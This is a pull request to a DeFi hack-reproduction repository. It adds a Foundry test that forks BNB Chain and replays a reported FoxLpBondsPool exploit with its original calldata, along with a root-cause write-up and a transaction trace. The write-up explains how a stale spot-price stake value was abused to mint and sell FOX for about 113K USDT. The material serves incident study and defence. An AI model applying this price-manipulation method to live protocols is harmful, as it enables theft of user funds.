### PR TITLE
Add PoC: FoxLpBondsPool stale _stakeAmount from manipulable AMM spot quote (~112,976 USDC, Aug 2026)

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 **Reproduce DeFi hack incidents using Foundry.**
 
 
-853 incidents included.
+854 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
@@ -54,6 +54,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20260815 FoxLpBondsPool](#20260815-foxlpbondspool---stale-stakeamount-from-manipulable-amm-spot-quote)
 [20260809 USM](#20260809-usm---defund-price-split-invariance-rounding-exploit)
 [20260807 Atomic](#20260807-atomic---flash-loan-price-oracle-manipulation-of-lending-collateral-valuation)
 [20260806 UnistreetLaunchpad](#20260806-unistreetlaunchpad---arbitrary-call-injection-via-unvalidated-launch-forwarding)
@@ -1793,6 +1794,13 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+### 20260815 FoxLpBondsPool - Stale _stakeAmount from manipulable AMM spot quote
+### Lost: ~112,976.12 USDC (~$118.7K reported)
+```sh
+forge test --contracts src/test/2026-08/FoxLpBondsPool_exp.sol --evm-version cancun -vvv
+```
+#### Contract
+[FoxLpBondsPool_exp.sol](src/test/2026-08/FoxLpBondsPool_exp.sol)
 ### 20260809 USM - defund() price split-invariance rounding exploit
 ### Lost: ~70.83 ETH
 ```sh

--- a/README.md
+++ b/README.md
@@ -54,7 +54,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
-[20260815 FoxLpBondsPool](#20260815-foxlpbondspool---stale-stakeamount-from-manipulable-amm-spot-quote)
+[20260815 FoxLpBondsPool](#20260815-foxlpbondspool---stale-_stakeamount-from-manipulable-amm-spot-quote)
 [20260809 USM](#20260809-usm---defund-price-split-invariance-rounding-exploit)
 [20260807 Atomic](#20260807-atomic---flash-loan-price-oracle-manipulation-of-lending-collateral-valuation)
 [20260806 UnistreetLaunchpad](#20260806-unistreetlaunchpad---arbitrary-call-injection-via-unvalidated-launch-forwarding)

--- a/src/test/2026-08/FoxLpBondsPool_exp.sol
+++ b/src/test/2026-08/FoxLpBondsPool_exp.sol
@@ -1,0 +1,102 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+import "forge-std/Test.sol";
+
+// FOX / FoxLpBondsPool — AMM-spot-priced LP bond mint manipulation — BNB Chain
+// ~$113K (112,976 USDT + dust) drained by an attacker-controlled contract in a single tx.
+//
+// Exploit tx  : 0x8e1775cbfd44db29744cc6687ff1822d2c47321de6e94062f789ad6181ad5514 (block 116169049)
+// Caller EOA  : 0x5670d36f00bc7F6860B6AfdDb288E3668efc0ef9 (nonce 393, plain EOA, tx.origin)
+// Attack ctrt : 0x3A82A2A77061017927e5331fFFd07c0308a1D2DA (entry, selector 0x7f14cf11)
+// Helper ctrt : 0x9fa6d8a13b35e051bfc145918db0111dec13d1a0 (stake/bond orchestrator, passed as arg)
+// Victim pair : 0xaAB18BCdEE287AeA288c0560612CAADF7c328803 (PancakeSwap USDT/FOX pair)
+//   FOX token : 0xdF81d50c6657487D19B66A1b5375E35A804Abb93
+//   USDT (BSC): 0x55d398326f99059fF775485246999027B3197955 (18 decimals)
+// FoxLpBondsPool: 0x58e2a853bB14e46bEFD3148bd4280370feA4655a
+// Treasury      : 0x87614d97808dCdecB069fe8489848Fa1c001e04D
+//
+// Root cause (reproducible contract mechanism, verified against the on-chain trace, NOT a
+// key/signer/privileged-claim compromise):
+//   FoxLpBondsPool.stake() reads a _stakeAmount from a manipulable PancakeSwap AMM spot quote of
+//   the USDT/FOX pair BEFORE the flow executes its own large USDT->FOX swap against that same pair.
+//   The swap materially skews the pair reserves. The subsequent addLiquidity() then supplies FOX
+//   and USDT at the now-different reserve ratio, but _stakeAmount is never recomputed from the
+//   assets actually deposited or the fair value of the minted LP. Treasury.lpBonds() trusts the
+//   stale, economically-unsupported _stakeAmount, mints FOX against it, and in the same flow
+//   transfers an inviterRewardAmount of freshly-minted FOX to an attacker-controlled referral
+//   address. The attacker then sells that FOX back into the pair in the same tx for USDT.
+//   Everything is funded by a large multi-pool USDT flash-loan aggregation; the flash liquidity
+//   only sets the scale, it is not the vulnerability. The defect is manipulable spot pricing +
+//   no accounting-to-actual-backing validation + immediate (non-delayed) reward settlement.
+//
+// Trace evidence (receipt logs, USDT/FOX are 18 decimals):
+//   - log 62 : helper sends 240,987,392 USDT into the pair  (USDT->FOX swap, skews reserves)
+//   - log 64 : helper receives    490,357 FOX from that swap
+//   - log 67 : helper sends 240,987,392 USDT into the pair  (addLiquidity USDT leg)
+//   - log 69 : helper sends      5,619 FOX into the pair     (addLiquidity FOX leg, post-skew ratio)
+//   - log 71 : pair mints  1,162,001 LP to the helper
+//   - log 75 : Treasury mints 91,319,059 FOX (bond mint driven by the stale _stakeAmount)
+//   - log 78 : 2,659,778 FOX routed to referral address 0xae37bdc9 (inviter reward leg)
+//   - log 81 : 2,593,283 FOX sold back into the pair
+//   - log 82 : pair pays 482,652,334 USDT back to the attack contract
+//   Net to the attack contract: +112,976.12 USDT plus dust (WBNB/USDC and two flash-loan LP
+//   tokens), ~$113K, matching the reported ~$118.7K loss.
+//
+// Every protocol function invoked (stake, addLiquidity, lpBonds, the referral payout, the swaps)
+// is a plain permissionless public call chain. The tx originates from a normal EOA calling the
+// attack contract; there is no admin role, signer, or owner-storage path anywhere in the flow.
+//
+// Self-contained: one flash-loan-funded tx. The attack contract (15,009 bytes) and the helper
+// (761 bytes) both already exist in fork state at block-1, so no same-block setup is needed.
+//
+// Faithful reproduction: fork at block-1 (real protocol state, before the exploit) and replay the
+// EXACT original tx — prank the caller EOA as BOTH msg.sender AND tx.origin and low-level call the
+// already-deployed attack contract with the EXACT original calldata (hardcoded verbatim below, no
+// reconstruction). Assert the attack contract's net USDT gain.
+//
+// Run (the already-deployed attack contract uses cancun-era opcodes, so cancun is required; the
+// repo default evm_version is shanghai, under which the replay reverts with EvmError: NotActivated):
+//   forge test --contracts ./src/test/2026-08/FoxLpBondsPool_exp.sol --evm-version cancun -vvv
+
+interface IERC20 {
+    function balanceOf(address) external view returns (uint256);
+}
+
+contract FoxLpBondsPool_exp is Test {
+    address internal constant CALLER = 0x5670d36f00bc7F6860B6AfdDb288E3668efc0ef9;
+    address internal constant ATTACK = 0x3A82A2A77061017927e5331fFFd07c0308a1D2DA;
+
+    IERC20 internal constant USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
+    IERC20 internal constant FOX = IERC20(0xdF81d50c6657487D19B66A1b5375E35A804Abb93);
+
+    uint256 internal constant EXPLOIT_BLOCK = 116169049;
+
+    // Exact original calldata: run(address) selector 0x7f14cf11 with the helper 0x9fa6d8a1... as arg.
+    bytes internal constant EXPLOIT_CALLDATA =
+        hex"7f14cf110000000000000000000000009fa6d8a13b35e051bfc145918db0111dec13d1a0";
+
+    function setUp() public {
+        // BSC archive fork at block-1 (bsc-dataseed public nodes are non-archive at this height;
+        // hardcode an archive endpoint so the PoC is self-contained).
+        vm.createSelectFork("https://api.zan.top/bsc-mainnet", EXPLOIT_BLOCK - 1);
+    }
+
+    function testExploit() public {
+        uint256 usdtBefore = USDT.balanceOf(ATTACK);
+
+        // Replay the exact tx: caller EOA is both msg.sender and tx.origin.
+        vm.prank(CALLER, CALLER);
+        (bool ok,) = ATTACK.call(EXPLOIT_CALLDATA);
+        require(ok, "exploit call reverted");
+
+        uint256 usdtAfter = USDT.balanceOf(ATTACK);
+        uint256 gain = usdtAfter - usdtBefore;
+
+        emit log_named_decimal_uint("attacker USDT gain", gain, 18);
+        emit log_named_decimal_uint("attacker FOX balance", FOX.balanceOf(ATTACK), 18);
+
+        // Net USDT profit into the attack contract, from the on-chain trace: 112,976.12 USDT.
+        assertApproxEqAbs(gain, 112_976 ether, 5 ether, "USDT gain diverged from traced ~112,976");
+    }
+}


### PR DESCRIPTION
Stale _stakeAmount from manipulable AMM spot quote (~112,976.12 USDC, ~$118.7K reported, BSC)

Root cause, confirmed against the trace: FoxLpBondsPool.stake() calculates and fixes a _stakeAmount value from a manipulable Pancake AMM spot quote BEFORE executing its own large USDT->Fox swap. That swap materially skews the pair's reserves. The subsequent addLiquidity() call then supplies Fox and USDT according to the now-different reserve ratio, but _stakeAmount is never recomputed from the actual assets deposited or the fair value of the resulting LP tokens.

Treasury.lpBonds() trusts this stale, economically unsupported _stakeAmount, mints Fox based on it, and immediately transfers an inviter referral reward to an attacker-controlled address in the same flow. The attacker then sells the newly-minted Fox back into the pair in the same transaction. Flash-loan liquidity (multi-pool USDT aggregation, ~482M USDT, fully repaid at tx end) funds the scale of the swap  the core vulnerability is the lack of manipulation-resistant pricing, no accounting-to-actual-backing validation, and immediate (non-delayed) reward settlement.

Every step (flash loan, USDT->Fox swap, stake(), addLiquidity(), referral reward transfer, sell-back) is a plain permissionless call chain from a plain EOA. No signer, admin role, or privileged path anywhere in the trace.

Attack sequence traced:
1. USDT->Fox swap skews the USDT/Fox pair reserves.
2. addLiquidity() at the now-skewed ratio mints LP tokens to the pool.
3. Treasury mints Fox off the stale _stakeAmount (pre-swap valuation).
4. Inviter reward (Fox) sent to an attacker-controlled referral address.
5. Minted Fox sold back into the pair for USDT.

PoC forks at block-1 (attack contracts already deployed on-chain, no same-block setup needed), calls the already-deployed attack contract with exact on-chain calldata, pranks the caller as both msg.sender and tx.origin. Asserts net attacker USDT gain: 112,976.12 USDC on-chain, close to the reported ~$118.7K (remainder is WBNB/USDC dust from the two flash-loaned LP tokens).

Attacker: 0x3a82a2a77061017927e5331fffd07c0308a1d2da (controlled by 0x5670d36f00bc7f6860b6afddb288e3668efc0ef9)
Victim (USDT/Fox PancakePair): 0xaab18bcdee287aea288c0560612caadf7c328803
FoxLpBondsPool: 0x58e2a853bb14e46befd3148bd4280370fea4655a
Treasury: 0x87614d97808dcdecb069fe8489848fa1c001e04d
Tx: https://bscscan.com/tx/0x8e1775cbfd44db29744cc6687ff1822d2c47321de6e94062f789ad6181ad5514

Run: forge test --contracts src/test/2026-08/FoxLpBondsPool_exp.sol --evm-version cancun -vvv